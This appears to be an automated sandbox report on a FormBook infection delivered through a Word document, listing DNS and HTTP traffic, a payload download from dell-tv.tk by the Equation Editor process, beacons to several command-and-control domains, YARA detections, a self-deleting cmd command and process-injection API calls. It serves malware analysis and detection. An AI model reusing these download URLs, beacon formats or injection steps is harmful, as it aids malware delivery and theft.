                                                            Nov 25, 2021 18:10:37.659904957 CET4916880192.168.2.2234.102.136.180
                                                            Nov 25, 2021 18:10:37.682557106 CET804916834.102.136.180192.168.2.22
                                                            Nov 25, 2021 18:10:42.421793938 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:42.459237099 CET8049169172.67.184.102192.168.2.22
                                                            Nov 25, 2021 18:10:42.459439039 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:42.459754944 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:42.497267008 CET8049169172.67.184.102192.168.2.22
                                                            Nov 25, 2021 18:10:43.044056892 CET8049169172.67.184.102192.168.2.22
                                                            Nov 25, 2021 18:10:43.044106007 CET8049169172.67.184.102192.168.2.22
                                                            Nov 25, 2021 18:10:43.044435978 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:43.044490099 CET4916980192.168.2.22172.67.184.102
                                                            Nov 25, 2021 18:10:43.081934929 CET8049169172.67.184.102192.168.2.22

                                                            UDP Packets

                                                            Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                                            Nov 25, 2021 18:08:39.086638927 CET  52167        53         192.168.2.22  8.8.8.8
                                                            Nov 25, 2021 18:08:39.124274969 CET  53           52167      8.8.8.8       192.168.2.22
                                                            Nov 25, 2021 18:10:26.811336994 CET  57805        53         192.168.2.22  8.8.8.8
                                                            Nov 25, 2021 18:10:26.902570963 CET  53           57805      8.8.8.8       192.168.2.22
                                                            Nov 25, 2021 18:10:31.908102989 CET  59030        53         192.168.2.22  8.8.8.8
                                                            Nov 25, 2021 18:10:31.964771032 CET  53           59030      8.8.8.8       192.168.2.22
                                                            Nov 25, 2021 18:10:37.156733990 CET  59185        53         192.168.2.22  8.8.8.8
                                                            Nov 25, 2021 18:10:37.213021040 CET  53           59185      8.8.8.8       192.168.2.22
                                                            Nov 25, 2021 18:10:42.365734100 CET  55616        53         192.168.2.22  8.8.8.8
                                                            Nov 25, 2021 18:10:42.420614958 CET  53           55616      8.8.8.8       192.168.2.22
                                                            Nov 25, 2021 18:10:48.059755087 CET  49972        53         192.168.2.22  8.8.8.8
                                                            Nov 25, 2021 18:10:48.129635096 CET  53           49972      8.8.8.8       192.168.2.22

                                                            DNS Queries

                                                            Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                         Type            Class
                                                            Nov 25, 2021 18:08:39.086638927 CET  192.168.2.22  8.8.8.8  0x2206    Standard query (0)  dell-tv.tk                   A (IP address)  IN (0x0001)
                                                            Nov 25, 2021 18:10:26.811336994 CET  192.168.2.22  8.8.8.8  0xfc43    Standard query (0)  www.bandhancustomer.com      A (IP address)  IN (0x0001)
                                                            Nov 25, 2021 18:10:31.908102989 CET  192.168.2.22  8.8.8.8  0x9c63    Standard query (0)  www.texaszephyr.com          A (IP address)  IN (0x0001)
                                                            Nov 25, 2021 18:10:37.156733990 CET  192.168.2.22  8.8.8.8  0x30e0    Standard query (0)  www.publicfigure.skin        A (IP address)  IN (0x0001)
                                                            Nov 25, 2021 18:10:42.365734100 CET  192.168.2.22  8.8.8.8  0x9037    Standard query (0)  www.volunteervabetweenk.com  A (IP address)  IN (0x0001)
                                                            Nov 25, 2021 18:10:48.059755087 CET  192.168.2.22  8.8.8.8  0xce43    Standard query (0)  www.1oavyx.com               A (IP address)  IN (0x0001)

                                                            DNS Answers

                                                            Timestamp                            Source IP  Dest IP       Trans ID  Reply Code      Name                         CName              Address         Type                    Class
                                                            Nov 25, 2021 18:08:39.124274969 CET  8.8.8.8    192.168.2.22  0x2206    No error (0)    dell-tv.tk                   -                  37.0.9.166      A (IP address)          IN (0x0001)
                                                            Nov 25, 2021 18:10:31.964771032 CET  8.8.8.8    192.168.2.22  0x9c63    No error (0)    www.texaszephyr.com          texaszephyr.com    -               CNAME (Canonical name)  IN (0x0001)
                                                            Nov 25, 2021 18:10:31.964771032 CET  8.8.8.8    192.168.2.22  0x9c63    No error (0)    texaszephyr.com              -                  34.102.136.180  A (IP address)          IN (0x0001)
                                                            Nov 25, 2021 18:10:37.213021040 CET  8.8.8.8    192.168.2.22  0x30e0    No error (0)    www.publicfigure.skin        publicfigure.skin  -               CNAME (Canonical name)  IN (0x0001)
                                                            Nov 25, 2021 18:10:37.213021040 CET  8.8.8.8    192.168.2.22  0x30e0    No error (0)    publicfigure.skin            -                  34.102.136.180  A (IP address)          IN (0x0001)
                                                            Nov 25, 2021 18:10:42.420614958 CET  8.8.8.8    192.168.2.22  0x9037    No error (0)    www.volunteervabetweenk.com  -                  172.67.184.102  A (IP address)          IN (0x0001)
                                                            Nov 25, 2021 18:10:42.420614958 CET  8.8.8.8    192.168.2.22  0x9037    No error (0)    www.volunteervabetweenk.com  -                  104.21.32.75    A (IP address)          IN (0x0001)
                                                            Nov 25, 2021 18:10:48.129635096 CET  8.8.8.8    192.168.2.22  0xce43    Name error (3)  www.1oavyx.com               none               none            A (IP address)          IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • dell-tv.tk
                                                            • www.texaszephyr.com
                                                            • www.publicfigure.skin
                                                            • www.volunteervabetweenk.com

                                                            HTTP Packets

                                                            Session ID: 0
                                                            Source IP: 192.168.2.22
                                                            Source Port: 49165
                                                            Destination IP: 37.0.9.166
                                                            Destination Port: 80
                                                            Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

                                                            Timestamp: Nov 25, 2021 18:08:39.172686100 CET
                                                            kBytes transferred: 0
                                                            Direction: OUT
                                                            Data:
                                                            GET /ashlyzx.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: dell-tv.tk
                                                            Connection: Keep-Alive
                                                            Timestamp: Nov 25, 2021 18:08:39.202337980 CET
                                                            kBytes transferred: 2
                                                            Direction: IN
                                                            Data:
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 25 Nov 2021 17:08:39 GMT
                                                            Content-Type: application/x-msdownload
                                                            Content-Length: 560128
                                                            Last-Modified: Thu, 25 Nov 2021 01:30:41 GMT
                                                            Connection: keep-alive
                                                            ETag: "619ee741-88c00"
                                                            Accept-Ranges: bytes


                                                            Session ID: 1
                                                            Source IP: 192.168.2.22
                                                            Source Port: 49167
                                                            Destination IP: 34.102.136.180
                                                            Destination Port: 80
                                                            Process: C:\Windows\explorer.exe

                                                            Timestamp: Nov 25, 2021 18:10:31.987536907 CET
                                                            kBytes transferred: 593
                                                            Direction: OUT
                                                            Data:
                                                            GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1
                                                            Host: www.texaszephyr.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Timestamp: Nov 25, 2021 18:10:32.106173992 CET
                                                            kBytes transferred: 593
                                                            Direction: IN
                                                            Data:
                                                            HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 17:10:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "618be75c-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session ID: 2
                                                            Source IP: 192.168.2.22
                                                            Source Port: 49168
                                                            Destination IP: 34.102.136.180
                                                            Destination Port: 80
                                                            Process: C:\Windows\explorer.exe

                                                            Timestamp: Nov 25, 2021 18:10:37.240250111 CET
                                                            kBytes transferred: 594
                                                            Direction: OUT
                                                            Data:
                                                            GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1
                                                            Host: www.publicfigure.skin
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Timestamp: Nov 25, 2021 18:10:37.357868910 CET
                                                            kBytes transferred: 594
                                                            Direction: IN
                                                            Data:
                                                            HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 17:10:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "618be75c-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session ID: 3
                                                            Source IP: 192.168.2.22
                                                            Source Port: 49169
                                                            Destination IP: 172.67.184.102
                                                            Destination Port: 80
                                                            Process: C:\Windows\explorer.exe

                                                            Timestamp: Nov 25, 2021 18:10:42.459754944 CET
                                                            kBytes transferred: 595
                                                            Direction: OUT
                                                            Data:
                                                            GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1
                                                            Host: www.volunteervabetweenk.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Timestamp: Nov 25, 2021 18:10:43.044056892 CET
                                                            kBytes transferred: 596
                                                            Direction: IN
                                                            Data:
                                                            HTTP/1.1 404 Not Found
                                                            Date: Thu, 25 Nov 2021 17:10:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            vary: Accept-Encoding
                                                            cache-control: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6b3c7df37c1c4230-AMS
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Code Manipulations

                                                            Statistics

                                                            CPU Usage


                                                            Memory Usage


                                                            High Level Behavior Distribution


                                                            Behavior


                                                            System Behavior

                                                            General

                                                            Start time: 18:08:15
                                                            Start date: 25/11/2021
                                                            Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit): false
                                                            Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase: 0x13f150000
                                                            File size: 1423704 bytes
                                                            MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high

                                                            General

                                                            Start time: 18:08:17
                                                            Start date: 25/11/2021
                                                            Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit): true
                                                            Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase: 0x400000
                                                            File size: 543304 bytes
                                                            MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high

                                                            General

                                                            Start time: 18:08:24
                                                            Start date: 25/11/2021
                                                            Path: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Wow64 process (32bit): true
                                                            Commandline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Imagebase: 0x60000
                                                            File size: 560128 bytes
                                                            MD5 hash: D236BB1F86CAEC110ABB20FC2360E25B
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: .Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425463492.0000000002241000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation: low

                                                            General

                                                            Start time: 18:08:25
                                                            Start date: 25/11/2021
                                                            Path: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Wow64 process (32bit): true
                                                            Commandline: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
                                                            Imagebase: 0x60000
                                                            File size: 560128 bytes
                                                            MD5 hash: D236BB1F86CAEC110ABB20FC2360E25B
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation: low

                                                            General

                                                            Start time: 18:08:28
                                                            Start date: 25/11/2021
                                                            Path: C:\Windows\explorer.exe
                                                            Wow64 process (32bit): false
                                                            Commandline: C:\Windows\Explorer.EXE
                                                            Imagebase: 0xffa10000
                                                            File size: 3229696 bytes
                                                            MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation: high

                                                            General

                                                            Start time: 18:08:41
                                                            Start date: 25/11/2021
                                                            Path: C:\Windows\SysWOW64\cmstp.exe
                                                            Wow64 process (32bit): true
                                                            Commandline: C:\Windows\SysWOW64\cmstp.exe
                                                            Imagebase: 0x110000
                                                            File size: 84992 bytes
                                                            MD5 hash: 00263CA2071DC9A6EE577EB356B0D1D9
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation: moderate

                                                            General

                                                            Start time: 18:08:45
                                                            Start date: 25/11/2021
                                                            Path: C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit): true
                                                            Commandline: /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
                                                            Imagebase: 0x4aac0000
                                                            File size: 302592 bytes
                                                            MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Reputation: high

                                                            Disassembly

                                                            Code Analysis


                                                              Executed Functions

                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0034C817
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 843507742a960c52944b326c32fcbb1d44fc7abc046a031122ede07c7ebcc82d
                                                              • Instruction ID: 4569ef839115763fc76bdd746f1b578f51aec4ceb52f574a642949c846c75f86
                                                              • Opcode Fuzzy Hash: 843507742a960c52944b326c32fcbb1d44fc7abc046a031122ede07c7ebcc82d
                                                              • Instruction Fuzzy Hash: 5EC13470D1121D8FDB61CFA4C841BEEBBB1BF09304F04A5A9D859BB240DB74AA85CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0034C28B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: d18917667ace8822144b418efa6f6447f78cad2fc7bd6d4205f5b9fecb047b17
                                                              • Instruction ID: 9e91db1f1bfb3e77c8e173d6e6073ee85f29e95b5c5a35736d273626c354c5e9
                                                              • Opcode Fuzzy Hash: d18917667ace8822144b418efa6f6447f78cad2fc7bd6d4205f5b9fecb047b17
                                                              • Instruction Fuzzy Hash: 6A4197B4D012589FCF00CFE9D984AEEBBF5BB49314F24942AE815BB200D775AA45CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0034C3CA
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 15899a0f928df8b89342572b7ef571dfb17c04ae49376c99a2f0fd871de929cb
                                                              • Instruction ID: 1b184dbdb7ffd38a79cdcf466be047d6898168f9bec09b5128e4f9e443f9bccd
                                                              • Opcode Fuzzy Hash: 15899a0f928df8b89342572b7ef571dfb17c04ae49376c99a2f0fd871de929cb
                                                              • Instruction Fuzzy Hash: 6541A8B9D002589FCF00CFA9E884AEEFBB5BB49314F10A42AE815B7200D775A945CF64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0034C13A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 651baace1f749580f98e80fbe619c51c543671acabec68a765a249302fd6a6ef
                                                              • Instruction ID: 09961ddf38deee24a4703c322b348729e569c62a08eb8d475dd16c127752eeee
                                                              • Opcode Fuzzy Hash: 651baace1f749580f98e80fbe619c51c543671acabec68a765a249302fd6a6ef
                                                              • Instruction Fuzzy Hash: 8D41A8B8D012589BCF10CFA9D884ADEFBB5FB49314F10A42AE815BB300D735A952CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0034C00F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: fdbf00b93dfa0e737c878d62cd45b4768bcce38fd638ca94ffa118482ffaf7b3
                                                              • Instruction ID: 8affdab45fc00f792c9adb8a07a1c1eca58d762b2e9f6860c8f71b474eeb2da6
                                                              • Opcode Fuzzy Hash: fdbf00b93dfa0e737c878d62cd45b4768bcce38fd638ca94ffa118482ffaf7b3
                                                              • Instruction Fuzzy Hash: 2641BBB4D012189FCB10CFA9D884AEEFBF5BB49314F24942AE415BB240D779AA85CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ResumeThread.KERNELBASE(?), ref: 0034BEEE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 45a80b09ed0867e574e388c27c6b0b6d4cfd800bcac205c05fda30e256e9a40f
                                                              • Instruction ID: 69f1017d35b1672dfb7de12ffa76cc7eab25285b3b6ebd102f524a9dc8047b75
                                                              • Opcode Fuzzy Hash: 45a80b09ed0867e574e388c27c6b0b6d4cfd800bcac205c05fda30e256e9a40f
                                                              • Instruction Fuzzy Hash: 8631A9B8D012189FCB10CFA9E884ADEFBB5FB49314F14942AE815B7300D775A945CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424813710.00000000002DD000.00000040.00000001.sdmp, Offset: 002DD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8e1838c6ea9074b40bf0836dfdd49df0fa39e4b20b044e884e42489f384b330
                                                              • Instruction ID: 8238bf593aee1653814385879d7765b5dfc5d8a5145a36381cf43423ce75eb35
                                                              • Opcode Fuzzy Hash: b8e1838c6ea9074b40bf0836dfdd49df0fa39e4b20b044e884e42489f384b330
                                                              • Instruction Fuzzy Hash: A8213474614604DFCB14CF20E884B16BB65EBC8315F24C9AAD80A4B346C337DC67CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424813710.00000000002DD000.00000040.00000001.sdmp, Offset: 002DD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52b5efcbece997ef977c343527f6738173df5995d75bcad69647382a91fcb44a
                                                              • Instruction ID: 6559a19accba171f618a2e482bc49005025e8ae656d433de26c820983feaa7d5
                                                              • Opcode Fuzzy Hash: 52b5efcbece997ef977c343527f6738173df5995d75bcad69647382a91fcb44a
                                                              • Instruction Fuzzy Hash: E3219D755087808FCB12CF24D994B15BF71EB86314F28C5EBD8498B697C33AD81ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424802504.00000000002CD000.00000040.00000001.sdmp, Offset: 002CD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e605ee5cb0c030dfc8abcf21740a385de09661d4966b8b1daa1ad2ef4408a2b4
                                                              • Instruction ID: 7d56df25343fe986bcf7a541764cea0e1127f50b0cdc5298091978a886083f9a
                                                              • Opcode Fuzzy Hash: e605ee5cb0c030dfc8abcf21740a385de09661d4966b8b1daa1ad2ef4408a2b4
                                                              • Instruction Fuzzy Hash: C30184714147449AE7208E65DC88FA7BFDCEF51724F18856EED091A283C3B5D850D6B2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424802504.00000000002CD000.00000040.00000001.sdmp, Offset: 002CD000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93dcdf60394e90d289676cf4ddcd0e419b79ac74d06a59b17dd53486b6e128b9
                                                              • Instruction ID: 6534ffcd66a0a812572063be209cbe2a937cee93b7fe149ae7eff2d416366e81
                                                              • Opcode Fuzzy Hash: 93dcdf60394e90d289676cf4ddcd0e419b79ac74d06a59b17dd53486b6e128b9
                                                              • Instruction Fuzzy Hash: E1F04F72404644ABE7208E15D888B62FFD8EB91734F28C56AED085A287C279AC44CAA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @2(m
                                                              • API String ID: 0-4091610512
                                                              • Opcode ID: d4123807c7c1a80979a81887240b73c0af540e577d3e0ca9c854a41d96db8f50
                                                              • Instruction ID: 75997839ae355cd4e36e9769697db99d99467512718b696167a9493054af4b2b
